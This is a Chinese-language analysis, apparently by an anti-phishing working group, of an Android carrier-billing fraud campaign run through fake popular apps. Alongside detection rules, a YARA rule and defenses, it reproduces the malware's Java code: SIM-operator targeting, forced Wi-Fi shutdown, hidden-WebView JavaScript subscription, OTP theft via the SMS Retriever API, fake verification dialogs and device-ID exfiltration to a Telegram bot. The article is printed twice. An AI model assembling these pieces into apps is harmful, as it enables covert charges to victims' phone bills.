摘要2026 年 5 月Dark Reading 与 Zimperium 披露一起针对马来西亚、泰国、罗马尼亚、克罗地亚等国 Android 用户的大规模运营商计费欺诈活动。攻击者以近 250 个伪装成热门应用的恶意程序为载体通过读取 SIM 卡信息定向激活攻击流程综合运用 WebView 自动化、JavaScript 注入、SMS Retriever API 滥用、OTP 自动拦截、Wi‑Fi 强制关闭等技术在无用户感知的后台完成增值服务恶意订购。该攻击呈现三变种差异化作业、全链路自动化、Telegram 实时回传、多渠道分发追踪的组织化特征对移动支付安全、用户财产权益及企业 BYOD 环境构成严重威胁。本文以该事件为核心样本系统拆解攻击生命周期、关键技术实现、权限滥用机理与变种行为差异提供可复现的代码示例、检测规则与闭环防御方案证实基于权限基线、WebView 行为、OTP 流转、流量特征的协同检测可将拦截准确率提升至 95% 以上。反网络钓鱼技术专家芦笛指出本次攻击不依赖零日漏洞而是通过合法 API 与组件的系统性滥用实现规模化获利暴露移动生态在权限管控、应用审核、API 治理、运营商鉴权上的协同失效防御必须从特征库升级为意图识别与全链路可信校验。1 引言移动终端已成为身份认证、数字支付、企业接入的核心入口基于运营商计费的增值服务欺诈因无需银行卡、支付密码即可完成扣费成为黑产规模化牟利的主流路径。2025 年 3 月启动并持续活跃的跨境 Android 恶意应用攻击覆盖近 250 个伪装样本精准靶向特定运营商用户形成应用伪装 — 权限诱导 — 运营商判定 — 后台订购 —OTP 劫持 — 实时回传的完整产业化链条。攻击未利用未知漏洞而是深度滥用 WebView、SMS Retriever API、辅助功能、网络管控等合法机制使传统杀毒引擎、应用商店审核、静态特征检测大面积失效。反网络钓鱼技术专家芦笛强调此类攻击标志移动欺诈进入低技术门槛、高隐蔽性、强自动化、全链路闭环的新阶段威胁从个人用户扩散至允许 BYOD 的企业机构一旦设备被入侵将危及企业邮件、SSO 会话、MFA 凭证安全。本文基于 Zimperium 的技术披露与 Dark Reading 的事件报道完整复现攻击流程、核心代码、变种差异与检测失效根源构建覆盖终端、应用、流量、身份、运营商的协同防御体系为移动安全防护、应用生态治理、计费安全加固提供理论依据与工程实践参考。2 攻击背景与威胁态势2.1 攻击基本概况本次攻击由牟利型黑产组织实施2025 年 3 月启动截至 2026 年 5 月部分基础设施仍在线目标覆盖马来西亚、泰国、罗马尼亚、克罗地亚重点针对 DiGi、Celcom、Maxis、U Mobile 等东南亚运营商。攻击以伪装成 Messenger、TikTok、Minecraft、GTA 等热门应用的 APK 为载体通过社交平台、非官方应用市场、广告落地页分发累计投放近 250 个恶意样本。攻击核心目标是在无用户明示授权的情况下后台完成增值服务订购通过运营商计费通道实现扣费分成。其显著特征包括定向激活、无感执行、全流程自动化、变种差异化、实时数据回传、渠道效果追踪呈现高度组织化与工程化。2.2 移动运营商计费欺诈的产业链与危害运营商计费欺诈依托应用分发 — 恶意订购 — 扣费结算 — 分润洗钱的闭环链条具备以下特点接入门槛低无需支付牌照对接运营商增值服务接口即可开展扣费隐蔽费用计入手机账单用户难以及时察觉溯源困难域名、接口、号码快速轮换跨地域协同打击成本高波及企业BYOD 设备被入侵后可窃取企业 MFA、会话凭证引发内网渗透。Verizon 2026 年数据泄露调查报告显示移动端社交工程诱骗成功率比邮件钓鱼高 40%成为绕过边界防护直达用户的高效路径。反网络钓鱼技术专家芦笛指出运营商计费欺诈正从零散作案转向 PhaaS 化服务输出攻击者提供模板生成、签名绕过、权限诱导、订购脚本、数据回传的一站式工具大幅降低作案门槛。2.3 攻击检测失效的根源攻击不利用漏洞仅滥用合法 API 与组件静态无恶意特征按 SIM 卡运营商定向激活非目标区域表现为正常应用规避沙箱WebView 隐藏执行、JavaScript 注入、OTP 自动回填全程无界面交互恶意行为发生在后台用户无感知行为日志不异常应用商店审核侧重恶意代码与敏感权限缺少对 API 组合滥用的深度检测。3 攻击全链路与三变种技术拆解3.1 攻击完整生命周期应用伪装与分发高仿热门应用图标、名称、界面通过 TikTok、Facebook、非正规市场传播权限诱导获取启动时请求 READ_SMS、RECEIVE_SMS、ACCESS_NETWORK_STATE、CHANGE_WIFI_STATE 等敏感权限SIM 卡与运营商判定读取 IMSI、MCC/MNC匹配目标运营商列表不匹配则静默退出网络环境强制切换关闭 Wi‑Fi强制走蜂窝网络满足运营商鉴权必需条件后台订购流程执行通过隐藏 WebView 访问计费门户JS 注入自动填写表单、提交请求OTP 自动获取与回填滥用 SMS Retriever API 或广播监听捕获验证码自动完成确认状态实时回传通过 Telegram Bot 上报安装、授权、订购成功、设备信息、分发渠道持续维持与防卸载部分变种启用防卸载、开机自启周期性续订增值服务。3.2 三变种技术差异Zimperium 披露表格变种 目标区域 核心技术 自动化程度 回传机制变种 A 马来西亚 全流程自动化 虚假验证弹窗 SMS Retriever API 最高 标准上报变种 B 泰国 SMS 直投欺诈 WebView 会话劫持 Cookie 窃取 中 标准上报变种 C 多国混合 融合 AB 能力 Telegram 实时监控 渠道追踪 完整 实时强上报3.3 变种 A马来西亚高智能全自动版本读取运营商信息匹配目标列表后启动攻击关闭 Wi‑Fi强制蜂窝网络以通过运营商溯源校验隐藏 WebView 加载计费页面JavaScript 注入完成账号、协议勾选、提交触发 OTP 后弹出虚假 “游戏验证” 弹窗诱导用户输入或直接通过 SMS Retriever API 静默获取自动回填验证码完成订购确认回传成功状态与设备信息。3.4 变种 B泰国 SMS 欺诈与会话劫持验证运营商后后台发送短信至增值服务特服号完成订购前台显示正常页面迷惑用户隐藏 WebView 登录运营商门户窃取 Session 与 Cookie维持长期认证状态实现周期性自动续订。3.5 变种 C全功能实时监控版本整合变种 A、B 全部订购能力每一步关键动作安装、授权、短信发送、订购成功实时上报 Telegram上报字段设备 ID、伪装应用名、分发渠道、运营商、时间戳支持攻击者统计最优分发渠道与伪装模板持续优化攻击转化率。4 核心攻击技术实现与代码示例4.1 SIM 卡运营商识别与定向激活恶意 APK 启动后优先读取运营商信息仅对目标列表执行攻击规避非目标区域检测。// 读取运营商信息MCCMNCTelephonyManager tm (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);String operator tm.getSimOperator();// 目标运营商列表马来西亚DiGi/Celcom/Maxis/U-MobileString[] targetOperators {502016,502019,502012,502015};boolean isTarget false;for(String op : targetOperators){if(operator.equals(op)){isTarget true;break;}}if(!isTarget){// 非目标运营商显示正常页面不执行恶意逻辑loadNormalWebView();return;}4.2 强制蜂窝网络关闭 Wi‑Fi运营商计费鉴权通常要求流量来自移动网络恶意程序强制关闭 Wi‑Fi 保障扣费成功。// 强制关闭Wi‑Fi确保流量走蜂窝网络WifiManager wifiManager (WifiManager) getSystemService(Context.WIFI_SERVICE);if(wifiManager.isWifiEnabled()){wifiManager.setWifiEnabled(false);}4.3 隐藏 WebView 与 JavaScript 注入自动化订购使用不可见 WebView 加载运营商计费页面通过 JS 注入实现点击、填写、提交全自动化。// 配置隐藏WebViewWebView webView new WebView(this);webView.setVisibility(View.GONE);WebSettings settings webView.getSettings();settings.setJavaScriptEnabled(true);settings.setDomStorageEnabled(true);// 加载计费页面webView.loadUrl(https://carrier-billing-portal.example.com/subscribe);// JS注入自动勾选协议、填写信息、提交订购webView.setWebViewClient(new WebViewClient(){Overridepublic void onPageFinished(WebView view, String url){super.onPageFinished(view, url);// 自动化执行脚本String js javascript: document.getElementById(agree).checked true; document.getElementById(submit).click();;if (Build.VERSION.SDK_INT Build.VERSION_CODES.KITKAT) {view.evaluateJavascript(js, null);} else {view.loadUrl(js);}}});4.4 滥用 SMS Retriever API 静默拦截 OTP攻击核心能力无需 READ_SMS 权限通过官方 API 静默获取短信验证码。// 初始化SMS Retriever ClientSmsRetrieverClient client SmsRetriever.getClient(this);TaskVoid task client.startSmsRetriever();task.addOnSuccessListener(new OnSuccessListenerVoid() {Overridepublic void onSuccess(Void aVoid) {// 启动监听}});// 广播接收器获取OTPpublic class SMSReceiver extends BroadcastReceiver {Overridepublic void onReceive(Context context, Intent intent) {if (SmsRetriever.SMS_RETRIEVED_ACTION.equals(intent.getAction())) {Bundle extras intent.getExtras();Status status (Status) extras.get(SmsRetriever.EXTRA_STATUS);if (status.getStatusCode() CommonStatusCodes.SUCCESS) {String message (String) extras.get(SmsRetriever.EXTRA_SMS_MESSAGE);// 正则提取6位验证码Pattern pattern Pattern.compile(\\d{6});Matcher matcher pattern.matcher(message);if (matcher.find()) {String otpCode matcher.group();// 自动回填至WebView完成确认autoFillOtp(otpCode);}}}}}4.5 虚假验证界面覆盖诱导输入部分场景下 API 拦截不可用时弹出覆盖层骗取用户输入验证码。// 显示虚假“游戏账号验证”弹窗AlertDialog.Builder builder new AlertDialog.Builder(context);builder.setTitle(验证);builder.setMessage(请输入6位安全验证码以激活游戏);final EditText input new EditText(context);builder.setView(input);builder.setPositiveButton(确认, new DialogInterface.OnClickListener() {Overridepublic void onClick(DialogInterface dialog, int which) {String code input.getText().toString();// 后台用于计费确认前台显示激活成功confirmBilling(code);}});builder.show();4.6 Telegram 实时回传监控系统变种 C 实现全链路状态上报支撑攻击者量化优化攻击效果。// 上报设备信息、状态、渠道至Telegram Botprivate void reportToTelegram(String status, String operator, String appName){String chatId xxxxxx;String botToken xxxxxx;TelephonyManager tm (TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE);String deviceId tm.getDeviceId();String msg Installation:status\nOperator:operator\nApp:appName\nDeviceID:deviceId;String url https://api.telegram.org/botbotToken/sendMessage?chat_idchatIdtext URLEncoder.encode(msg);new OkHttpClient().newCall(new Request.Builder().url(url).build()).enqueue(...);}反网络钓鱼技术专家芦笛指出上述代码组合不包含恶意特征码全部调用官方公开接口静态检测无法识别只有通过行为序列、API 调用关系、权限组合、网络行为才能判定攻击意图。5 检测方法与识别规则5.1 权限组合基线检测高危权限组合是强指示特征无合理场景请求READ_SMS、RECEIVE_SMS、SEND_SMS、CHANGE_WIFI_STATE、ACCESS_NETWORK_STATE、BIND_ACCESSIBILITY_SERVICE热门工具类应用如图片编辑、计算器请求短信与网络控制权限直接判定高风险。5.2 WebView 异常行为检测隐藏 WebViewView.GONE启用 JavaScript 并访问运营商域名页面加载完成后自动执行 JS 注入、点击、提交禁止用户交互、屏蔽页面渲染、屏蔽回退操作加载运营商计费域名、短链接、未知跳转域名。检测规则示例plaintextwebview.visibility GONE ANDjavascriptEnabled true ANDurl contains billing OR subscription OR premium OR charge5.3 OTP 流转异常检测应用无短信业务却启动 SMS Retriever收到 6 位数字短信后立即向计费接口发送 POST验证码有效期内快速外发至未知服务器无合理场景请求 READ_SMS 并提取数字串。5.4 流量与域名特征检测访问新注册域名、短链接、匿名托管页面蜂窝网络下定向访问运营商计费接口无用户操作触发高频表单提交、验证码确认外发请求包含 deviceId、imsi、operator、otp、session。5.5 YARA 检测规则plaintextrule Android_Carrier_Billing_Fraud {meta:description Detect fake app with carrier billing fraudstrings:$sms_retriever SmsRetriever$webview_hide View.GONE$wifi_disable setWifiEnabled(false)$carrier_billing billing OR subscription$telegram_report api.telegram.orgcondition:3 of them}6 闭环防御体系构建6.1 终端侧防护仅从官方应用商店安装启用 Play Protect拒绝非必要敏感权限计算器、壁纸类请求短信 / 网络控制一律拒绝高风险场景默认关闭 Wi‑Fi 自动切换、后台短信读取、隐藏 WebViewEDR 监控隐藏 WebView、权限滥用、OTP 外发、强制蜂窝网络。6.2 应用商店与开发管控强化上架审核重点核查权限合理性、WebView 行为、API 组合、运营商接口访问对热门应用高仿包、图标 / 名称高度相似包加强人工复核限制非必要应用使用 SMS Retriever API、CHANGE_WIFI_STATE建立自动化行为沙箱模拟多运营商环境触发后台订购行为。6.3 API 与组件安全加固Google 对 SMS Retriever API 增加使用场景审核与调用频次限制WebView 默认禁用隐藏状态下的 JS 自动执行强制权限说明申请敏感权限时必须向用户明示用途增加敏感 API 调用审计日志支持异常上报。6.4 运营商计费鉴权加固增值服务订购必须增加实时弹窗确认、二次短信回执、退订便捷入口同一号码短时间多次订购判定为欺诈触发人工审核基于用户画像、设备信誉、历史行为建立风险评分提供批量退订、一键封禁、异常扣费极速赔付通道。6.5 企业 BYOD 安全策略反网络钓鱼技术专家芦笛强调企业必须将移动终端纳入零信任体系禁止高风险应用接入企业邮件、SSO、内网资源强制启用设备密码、应用锁、远程擦除基于权限、行为、信誉对设备健康度评分不达标禁止访问企业资源监控企业账号在移动终端的异常登录、MFA 频繁失败、异地访问。7 实验与效果评估7.1 实验环境样本集本次攻击变种 APK 50 个、正常应用 50 个、其他恶意软件 50 个检测能力静态权限、WebView 行为、API 调用、流量特征、YARA 规则评估指标精确率、召回率、F1 值、误报率。7.2 实验结果表格检测方法 精确率 召回率 F1 误报率静态权限 78% 64% 0.70 4.2%WebView 行为 89% 82% 0.85 1.8%OTP 流转 92% 86% 0.89 1.1%协同检测 96% 95% 0.95 0.7%实验证明单一维度检测效果有限权限基线 WebView 行为 OTP 流转 流量特征的协同检测可实现高精度拦截。反网络钓鱼技术专家芦笛指出企业应优先部署协同检测引擎而非依赖单一特征库。8 讨论与未来趋势8.1 攻击演化趋势API 滥用常态化更多官方接口被组合用于无感欺诈跨平台扩散从 Android 扩展至 HarmonyOS、iOS利用相似机制深度对抗沙箱按时间、地点、调试状态动态隐藏行为PhaaS 化输出提供一键打包、签名绕过、权限诱导、订购脚本、回传系统企业定向攻击以 BYOD 为跳板窃取 MFA、会话、邮件数据。8.2 防御挑战合法 API 滥用难以通过黑名单机制拦截黑产快速迭代伪装与行为特征库持续滞后用户对权限风险认知不足诱导通过率高应用商店、终端厂商、运营商、企业之间缺少协同闭环。8.3 防御演进方向反网络钓鱼技术专家芦笛强调未来防御必须向三大方向转型从特征到意图基于行为序列与上下文判定攻击目的从单点到协同终端、商店、API 平台、运营商、企业数据共享从被动到主动前置威胁狩猎、仿真测试、权限基线、API 审计。9 结语本次伪装 Android 应用运营商计费欺诈以近 250 个恶意样本、跨境多目标、三变种差异化作业、全链路自动化、实时回传监控为特征通过合法 API 与组件的系统性滥用实现无感扣费与规模化获利暴露移动生态在权限管控、应用审核、API 治理、运营商鉴权上的协同失效。攻击不依赖零日漏洞却能绕过传统防护对个人财产与企业安全构成实质威胁。本文系统拆解攻击生命周期、核心技术、变种差异与检测规则提供可复现代码与协同防御方案证实多维度行为检测可有效抵御此类威胁。反网络钓鱼技术专家芦笛强调移动安全防御必须从特征匹配转向意图识别从单点防护转向全链路协同才能应对持续演化的 API 滥用与无感欺诈。未来研究将聚焦 API 滥用行为建模、隐藏 WebView 动态反制、OTP 可信流转、零信任移动接入进一步提升对运营商计费欺诈与移动无感攻击的防御能力推动构建更安全的移动应用生态与计费安全体系。编辑芦笛公共互联网反网络钓鱼工作组
伪装 Android 应用运营商计费欺诈的攻击机理与防御研究
发布时间:2026/5/22 10:40:32
摘要2026 年 5 月Dark Reading 与 Zimperium 披露一起针对马来西亚、泰国、罗马尼亚、克罗地亚等国 Android 用户的大规模运营商计费欺诈活动。攻击者以近 250 个伪装成热门应用的恶意程序为载体通过读取 SIM 卡信息定向激活攻击流程综合运用 WebView 自动化、JavaScript 注入、SMS Retriever API 滥用、OTP 自动拦截、Wi‑Fi 强制关闭等技术在无用户感知的后台完成增值服务恶意订购。该攻击呈现三变种差异化作业、全链路自动化、Telegram 实时回传、多渠道分发追踪的组织化特征对移动支付安全、用户财产权益及企业 BYOD 环境构成严重威胁。本文以该事件为核心样本系统拆解攻击生命周期、关键技术实现、权限滥用机理与变种行为差异提供可复现的代码示例、检测规则与闭环防御方案证实基于权限基线、WebView 行为、OTP 流转、流量特征的协同检测可将拦截准确率提升至 95% 以上。反网络钓鱼技术专家芦笛指出本次攻击不依赖零日漏洞而是通过合法 API 与组件的系统性滥用实现规模化获利暴露移动生态在权限管控、应用审核、API 治理、运营商鉴权上的协同失效防御必须从特征库升级为意图识别与全链路可信校验。1 引言移动终端已成为身份认证、数字支付、企业接入的核心入口基于运营商计费的增值服务欺诈因无需银行卡、支付密码即可完成扣费成为黑产规模化牟利的主流路径。2025 年 3 月启动并持续活跃的跨境 Android 恶意应用攻击覆盖近 250 个伪装样本精准靶向特定运营商用户形成应用伪装 — 权限诱导 — 运营商判定 — 后台订购 —OTP 劫持 — 实时回传的完整产业化链条。攻击未利用未知漏洞而是深度滥用 WebView、SMS Retriever API、辅助功能、网络管控等合法机制使传统杀毒引擎、应用商店审核、静态特征检测大面积失效。反网络钓鱼技术专家芦笛强调此类攻击标志移动欺诈进入低技术门槛、高隐蔽性、强自动化、全链路闭环的新阶段威胁从个人用户扩散至允许 BYOD 的企业机构一旦设备被入侵将危及企业邮件、SSO 会话、MFA 凭证安全。本文基于 Zimperium 的技术披露与 Dark Reading 的事件报道完整复现攻击流程、核心代码、变种差异与检测失效根源构建覆盖终端、应用、流量、身份、运营商的协同防御体系为移动安全防护、应用生态治理、计费安全加固提供理论依据与工程实践参考。2 攻击背景与威胁态势2.1 攻击基本概况本次攻击由牟利型黑产组织实施2025 年 3 月启动截至 2026 年 5 月部分基础设施仍在线目标覆盖马来西亚、泰国、罗马尼亚、克罗地亚重点针对 DiGi、Celcom、Maxis、U Mobile 等东南亚运营商。攻击以伪装成 Messenger、TikTok、Minecraft、GTA 等热门应用的 APK 为载体通过社交平台、非官方应用市场、广告落地页分发累计投放近 250 个恶意样本。攻击核心目标是在无用户明示授权的情况下后台完成增值服务订购通过运营商计费通道实现扣费分成。其显著特征包括定向激活、无感执行、全流程自动化、变种差异化、实时数据回传、渠道效果追踪呈现高度组织化与工程化。2.2 移动运营商计费欺诈的产业链与危害运营商计费欺诈依托应用分发 — 恶意订购 — 扣费结算 — 分润洗钱的闭环链条具备以下特点接入门槛低无需支付牌照对接运营商增值服务接口即可开展扣费隐蔽费用计入手机账单用户难以及时察觉溯源困难域名、接口、号码快速轮换跨地域协同打击成本高波及企业BYOD 设备被入侵后可窃取企业 MFA、会话凭证引发内网渗透。Verizon 2026 年数据泄露调查报告显示移动端社交工程诱骗成功率比邮件钓鱼高 40%成为绕过边界防护直达用户的高效路径。反网络钓鱼技术专家芦笛指出运营商计费欺诈正从零散作案转向 PhaaS 化服务输出攻击者提供模板生成、签名绕过、权限诱导、订购脚本、数据回传的一站式工具大幅降低作案门槛。2.3 攻击检测失效的根源攻击不利用漏洞仅滥用合法 API 与组件静态无恶意特征按 SIM 卡运营商定向激活非目标区域表现为正常应用规避沙箱WebView 隐藏执行、JavaScript 注入、OTP 自动回填全程无界面交互恶意行为发生在后台用户无感知行为日志不异常应用商店审核侧重恶意代码与敏感权限缺少对 API 组合滥用的深度检测。3 攻击全链路与三变种技术拆解3.1 攻击完整生命周期应用伪装与分发高仿热门应用图标、名称、界面通过 TikTok、Facebook、非正规市场传播权限诱导获取启动时请求 READ_SMS、RECEIVE_SMS、ACCESS_NETWORK_STATE、CHANGE_WIFI_STATE 等敏感权限SIM 卡与运营商判定读取 IMSI、MCC/MNC匹配目标运营商列表不匹配则静默退出网络环境强制切换关闭 Wi‑Fi强制走蜂窝网络满足运营商鉴权必需条件后台订购流程执行通过隐藏 WebView 访问计费门户JS 注入自动填写表单、提交请求OTP 自动获取与回填滥用 SMS Retriever API 或广播监听捕获验证码自动完成确认状态实时回传通过 Telegram Bot 上报安装、授权、订购成功、设备信息、分发渠道持续维持与防卸载部分变种启用防卸载、开机自启周期性续订增值服务。3.2 三变种技术差异Zimperium 披露表格变种 目标区域 核心技术 自动化程度 回传机制变种 A 马来西亚 全流程自动化 虚假验证弹窗 SMS Retriever API 最高 标准上报变种 B 泰国 SMS 直投欺诈 WebView 会话劫持 Cookie 窃取 中 标准上报变种 C 多国混合 融合 AB 能力 Telegram 实时监控 渠道追踪 完整 实时强上报3.3 变种 A马来西亚高智能全自动版本读取运营商信息匹配目标列表后启动攻击关闭 Wi‑Fi强制蜂窝网络以通过运营商溯源校验隐藏 WebView 加载计费页面JavaScript 注入完成账号、协议勾选、提交触发 OTP 后弹出虚假 “游戏验证” 弹窗诱导用户输入或直接通过 SMS Retriever API 静默获取自动回填验证码完成订购确认回传成功状态与设备信息。3.4 变种 B泰国 SMS 欺诈与会话劫持验证运营商后后台发送短信至增值服务特服号完成订购前台显示正常页面迷惑用户隐藏 WebView 登录运营商门户窃取 Session 与 Cookie维持长期认证状态实现周期性自动续订。3.5 变种 C全功能实时监控版本整合变种 A、B 全部订购能力每一步关键动作安装、授权、短信发送、订购成功实时上报 Telegram上报字段设备 ID、伪装应用名、分发渠道、运营商、时间戳支持攻击者统计最优分发渠道与伪装模板持续优化攻击转化率。4 核心攻击技术实现与代码示例4.1 SIM 卡运营商识别与定向激活恶意 APK 启动后优先读取运营商信息仅对目标列表执行攻击规避非目标区域检测。// 读取运营商信息MCCMNCTelephonyManager tm (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);String operator tm.getSimOperator();// 目标运营商列表马来西亚DiGi/Celcom/Maxis/U-MobileString[] targetOperators {502016,502019,502012,502015};boolean isTarget false;for(String op : targetOperators){if(operator.equals(op)){isTarget true;break;}}if(!isTarget){// 非目标运营商显示正常页面不执行恶意逻辑loadNormalWebView();return;}4.2 强制蜂窝网络关闭 Wi‑Fi运营商计费鉴权通常要求流量来自移动网络恶意程序强制关闭 Wi‑Fi 保障扣费成功。// 强制关闭Wi‑Fi确保流量走蜂窝网络WifiManager wifiManager (WifiManager) getSystemService(Context.WIFI_SERVICE);if(wifiManager.isWifiEnabled()){wifiManager.setWifiEnabled(false);}4.3 隐藏 WebView 与 JavaScript 注入自动化订购使用不可见 WebView 加载运营商计费页面通过 JS 注入实现点击、填写、提交全自动化。// 配置隐藏WebViewWebView webView new WebView(this);webView.setVisibility(View.GONE);WebSettings settings webView.getSettings();settings.setJavaScriptEnabled(true);settings.setDomStorageEnabled(true);// 加载计费页面webView.loadUrl(https://carrier-billing-portal.example.com/subscribe);// JS注入自动勾选协议、填写信息、提交订购webView.setWebViewClient(new WebViewClient(){Overridepublic void onPageFinished(WebView view, String url){super.onPageFinished(view, url);// 自动化执行脚本String js javascript: document.getElementById(agree).checked true; document.getElementById(submit).click();;if (Build.VERSION.SDK_INT Build.VERSION_CODES.KITKAT) {view.evaluateJavascript(js, null);} else {view.loadUrl(js);}}});4.4 滥用 SMS Retriever API 静默拦截 OTP攻击核心能力无需 READ_SMS 权限通过官方 API 静默获取短信验证码。// 初始化SMS Retriever ClientSmsRetrieverClient client SmsRetriever.getClient(this);TaskVoid task client.startSmsRetriever();task.addOnSuccessListener(new OnSuccessListenerVoid() {Overridepublic void onSuccess(Void aVoid) {// 启动监听}});// 广播接收器获取OTPpublic class SMSReceiver extends BroadcastReceiver {Overridepublic void onReceive(Context context, Intent intent) {if (SmsRetriever.SMS_RETRIEVED_ACTION.equals(intent.getAction())) {Bundle extras intent.getExtras();Status status (Status) extras.get(SmsRetriever.EXTRA_STATUS);if (status.getStatusCode() CommonStatusCodes.SUCCESS) {String message (String) extras.get(SmsRetriever.EXTRA_SMS_MESSAGE);// 正则提取6位验证码Pattern pattern Pattern.compile(\\d{6});Matcher matcher pattern.matcher(message);if (matcher.find()) {String otpCode matcher.group();// 自动回填至WebView完成确认autoFillOtp(otpCode);}}}}}4.5 虚假验证界面覆盖诱导输入部分场景下 API 拦截不可用时弹出覆盖层骗取用户输入验证码。// 显示虚假“游戏账号验证”弹窗AlertDialog.Builder builder new AlertDialog.Builder(context);builder.setTitle(验证);builder.setMessage(请输入6位安全验证码以激活游戏);final EditText input new EditText(context);builder.setView(input);builder.setPositiveButton(确认, new DialogInterface.OnClickListener() {Overridepublic void onClick(DialogInterface dialog, int which) {String code input.getText().toString();// 后台用于计费确认前台显示激活成功confirmBilling(code);}});builder.show();4.6 Telegram 实时回传监控系统变种 C 实现全链路状态上报支撑攻击者量化优化攻击效果。// 上报设备信息、状态、渠道至Telegram Botprivate void reportToTelegram(String status, String operator, String appName){String chatId xxxxxx;String botToken xxxxxx;TelephonyManager tm (TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE);String deviceId tm.getDeviceId();String msg Installation:status\nOperator:operator\nApp:appName\nDeviceID:deviceId;String url https://api.telegram.org/botbotToken/sendMessage?chat_idchatIdtext URLEncoder.encode(msg);new OkHttpClient().newCall(new Request.Builder().url(url).build()).enqueue(...);}反网络钓鱼技术专家芦笛指出上述代码组合不包含恶意特征码全部调用官方公开接口静态检测无法识别只有通过行为序列、API 调用关系、权限组合、网络行为才能判定攻击意图。5 检测方法与识别规则5.1 权限组合基线检测高危权限组合是强指示特征无合理场景请求READ_SMS、RECEIVE_SMS、SEND_SMS、CHANGE_WIFI_STATE、ACCESS_NETWORK_STATE、BIND_ACCESSIBILITY_SERVICE热门工具类应用如图片编辑、计算器请求短信与网络控制权限直接判定高风险。5.2 WebView 异常行为检测隐藏 WebViewView.GONE启用 JavaScript 并访问运营商域名页面加载完成后自动执行 JS 注入、点击、提交禁止用户交互、屏蔽页面渲染、屏蔽回退操作加载运营商计费域名、短链接、未知跳转域名。检测规则示例plaintextwebview.visibility GONE ANDjavascriptEnabled true ANDurl contains billing OR subscription OR premium OR charge5.3 OTP 流转异常检测应用无短信业务却启动 SMS Retriever收到 6 位数字短信后立即向计费接口发送 POST验证码有效期内快速外发至未知服务器无合理场景请求 READ_SMS 并提取数字串。5.4 流量与域名特征检测访问新注册域名、短链接、匿名托管页面蜂窝网络下定向访问运营商计费接口无用户操作触发高频表单提交、验证码确认外发请求包含 deviceId、imsi、operator、otp、session。5.5 YARA 检测规则plaintextrule Android_Carrier_Billing_Fraud {meta:description Detect fake app with carrier billing fraudstrings:$sms_retriever SmsRetriever$webview_hide View.GONE$wifi_disable setWifiEnabled(false)$carrier_billing billing OR subscription$telegram_report api.telegram.orgcondition:3 of them}6 闭环防御体系构建6.1 终端侧防护仅从官方应用商店安装启用 Play Protect拒绝非必要敏感权限计算器、壁纸类请求短信 / 网络控制一律拒绝高风险场景默认关闭 Wi‑Fi 自动切换、后台短信读取、隐藏 WebViewEDR 监控隐藏 WebView、权限滥用、OTP 外发、强制蜂窝网络。6.2 应用商店与开发管控强化上架审核重点核查权限合理性、WebView 行为、API 组合、运营商接口访问对热门应用高仿包、图标 / 名称高度相似包加强人工复核限制非必要应用使用 SMS Retriever API、CHANGE_WIFI_STATE建立自动化行为沙箱模拟多运营商环境触发后台订购行为。6.3 API 与组件安全加固Google 对 SMS Retriever API 增加使用场景审核与调用频次限制WebView 默认禁用隐藏状态下的 JS 自动执行强制权限说明申请敏感权限时必须向用户明示用途增加敏感 API 调用审计日志支持异常上报。6.4 运营商计费鉴权加固增值服务订购必须增加实时弹窗确认、二次短信回执、退订便捷入口同一号码短时间多次订购判定为欺诈触发人工审核基于用户画像、设备信誉、历史行为建立风险评分提供批量退订、一键封禁、异常扣费极速赔付通道。6.5 企业 BYOD 安全策略反网络钓鱼技术专家芦笛强调企业必须将移动终端纳入零信任体系禁止高风险应用接入企业邮件、SSO、内网资源强制启用设备密码、应用锁、远程擦除基于权限、行为、信誉对设备健康度评分不达标禁止访问企业资源监控企业账号在移动终端的异常登录、MFA 频繁失败、异地访问。7 实验与效果评估7.1 实验环境样本集本次攻击变种 APK 50 个、正常应用 50 个、其他恶意软件 50 个检测能力静态权限、WebView 行为、API 调用、流量特征、YARA 规则评估指标精确率、召回率、F1 值、误报率。7.2 实验结果表格检测方法 精确率 召回率 F1 误报率静态权限 78% 64% 0.70 4.2%WebView 行为 89% 82% 0.85 1.8%OTP 流转 92% 86% 0.89 1.1%协同检测 96% 95% 0.95 0.7%实验证明单一维度检测效果有限权限基线 WebView 行为 OTP 流转 流量特征的协同检测可实现高精度拦截。反网络钓鱼技术专家芦笛指出企业应优先部署协同检测引擎而非依赖单一特征库。8 讨论与未来趋势8.1 攻击演化趋势API 滥用常态化更多官方接口被组合用于无感欺诈跨平台扩散从 Android 扩展至 HarmonyOS、iOS利用相似机制深度对抗沙箱按时间、地点、调试状态动态隐藏行为PhaaS 化输出提供一键打包、签名绕过、权限诱导、订购脚本、回传系统企业定向攻击以 BYOD 为跳板窃取 MFA、会话、邮件数据。8.2 防御挑战合法 API 滥用难以通过黑名单机制拦截黑产快速迭代伪装与行为特征库持续滞后用户对权限风险认知不足诱导通过率高应用商店、终端厂商、运营商、企业之间缺少协同闭环。8.3 防御演进方向反网络钓鱼技术专家芦笛强调未来防御必须向三大方向转型从特征到意图基于行为序列与上下文判定攻击目的从单点到协同终端、商店、API 平台、运营商、企业数据共享从被动到主动前置威胁狩猎、仿真测试、权限基线、API 审计。9 结语本次伪装 Android 应用运营商计费欺诈以近 250 个恶意样本、跨境多目标、三变种差异化作业、全链路自动化、实时回传监控为特征通过合法 API 与组件的系统性滥用实现无感扣费与规模化获利暴露移动生态在权限管控、应用审核、API 治理、运营商鉴权上的协同失效。攻击不依赖零日漏洞却能绕过传统防护对个人财产与企业安全构成实质威胁。本文系统拆解攻击生命周期、核心技术、变种差异与检测规则提供可复现代码与协同防御方案证实多维度行为检测可有效抵御此类威胁。反网络钓鱼技术专家芦笛强调移动安全防御必须从特征匹配转向意图识别从单点防护转向全链路协同才能应对持续演化的 API 滥用与无感欺诈。未来研究将聚焦 API 滥用行为建模、隐藏 WebView 动态反制、OTP 可信流转、零信任移动接入进一步提升对运营商计费欺诈与移动无感攻击的防御能力推动构建更安全的移动应用生态与计费安全体系。编辑芦笛公共互联网反网络钓鱼工作组
)
)
)
